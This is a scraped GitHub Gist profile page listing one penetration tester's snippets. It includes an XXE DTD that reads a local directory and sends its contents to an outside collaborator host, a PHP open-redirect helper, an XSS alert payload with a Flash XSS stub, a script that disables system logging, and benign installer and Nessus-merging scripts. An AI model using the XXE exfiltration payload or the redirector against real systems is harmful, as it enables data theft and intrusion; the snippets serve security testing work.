Skip to content

Instantly share code, notes, and snippets.

View jamieparfet's full-sized avatar

jamieparfet jamieparfet

4 followers · 4 following
View GitHub Profile
@jamieparfet
jamieparfet / xxe.dtd
Last active October 17, 2023 08:49
<!ENTITY % file SYSTEM "file:///opt/">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'https://4qvcx4mt5ytnfqnbhxe3w28tqkwck48t.oastify.com/?x=%file;'>">
%eval;
%exfil;
@jamieparfet
jamieparfet / router.php
Created July 13, 2020 19:41
Simple PHP server to redirect to specified location based on requested extension
<?php
// php -S 0.0.0.0:8000 router.php
// http://host/x.jsp?u=http://example.com
if (preg_match('/\.(?:jsp)/', $_SERVER["REQUEST_URI"])) {
$location = $_GET['u'];
Header("Location: ".$location);
} else {
echo "error";
}
@jamieparfet
jamieparfet / flash-analyzer.sh
Last active January 21, 2020 21:03
#!/bin/bash
grep_list="clicktag|\
externalInterface\.addCallback|\
externalInterface\.call|\
flash\.external\.ExternalInterface\.call|\
flashvars|\
FScrollPane\.loadScrollContent|\
geturl\(_root|\
geturlBlankVar|\
@jamieparfet
jamieparfet / install-oracle-java8.sh
Last active September 10, 2020 12:33
#!/bin/bash
dpkg-query -W -f='${binary:Package}\n' | grep -E -e '^(ia32-)?(sun|oracle)-java' -e '^openjdk-' -e '^icedtea' -e '^(default|gcj)-j(re|dk)' -e '^gcj-(.*)-j(re|dk)' -e '^java-common' | xargs sudo apt-get -y remove
sudo apt-get -y autoremove
# beware - this removes virtualbox config files
dpkg -l | grep ^rc | awk '{print($2)}' | xargs sudo apt-get -y purge
mkdir /opt/jdk
# download 'jdk-8u221-linux-x64.tar.gz'
tar -zxf jdk-8u221-linux-x64.tar.gz -C /opt/jdk
@jamieparfet
jamieparfet / install-flash-for-firefox.sh
Created June 23, 2019 09:41
#!/bin/bash
# Set Firefox's plugins dir
firefox_flash_install_dir="/usr/lib/mozilla/plugins"
# Setup Arch
case $(uname -m) in
x86_64) arch=x86_64 ;;
i?86) arch=i386 ;;
esac
@jamieparfet
jamieparfet / xss
Created April 4, 2019 14:19
alert(document.location)
@jamieparfet
jamieparfet / xss.as
Created November 30, 2018 10:45
package
{
import flash.display.Sprite;
import flash.text.TextField;
import flash.external.ExternalInterface;
public class xss extends Sprite
{
public function xss()
{
@jamieparfet
jamieparfet / macOS-mojave-iso.sh
Last active February 11, 2023 19:16
Create an ISO from the mojave installer app
#!/bin/bash
# This assumes that the ~6GB mojave installer is in the /Applications folder.
# If it's not, just open the App Store, search Mojave, and you can download the installer file from there.
hdiutil create -o /tmp/mojave.cdr -size 6g -layout SPUD -fs HFS+J
hdiutil attach /tmp/mojave.cdr.dmg -noverify -mountpoint /Volumes/install_mojave
sudo /Applications/Install\ macOS\ mojave.app/Contents/Resources/createinstallmedia --volume /Volumes/install_mojave
mv /tmp/mojave.cdr.dmg ~/Desktop/InstallSystem.dmg
hdiutil detach /Volumes/Install\ macOS\ mojave
@jamieparfet
jamieparfet / kali-setup.sh
Last active January 26, 2019 20:38
#!/bin/bash
# Disable logging
service rsyslog stop
systemctl disable rsyslog
rm ~/.profile ~/.bashrc
wget -O ~/.profile https://raw.githubusercontent.com/jamieparfet/zone/master/dotfiles/.profile
wget -O ~/.bashrc https://raw.githubusercontent.com/jamieparfet/zone/master/dotfiles/.bashrc
wget -O ~/.tmux.conf https://raw.githubusercontent.com/jamieparfet/zone/master/dotfiles/.tmux.conf
@jamieparfet
jamieparfet / nessus-merger.py
Created July 25, 2018 14:29
import xml.etree.ElementTree as etree
import shutil
import os
first = 1
for fileName in os.listdir("."):
if ".nessus" in fileName:
print(":: Parsing", fileName)
if first:
mainTree = etree.parse(fileName)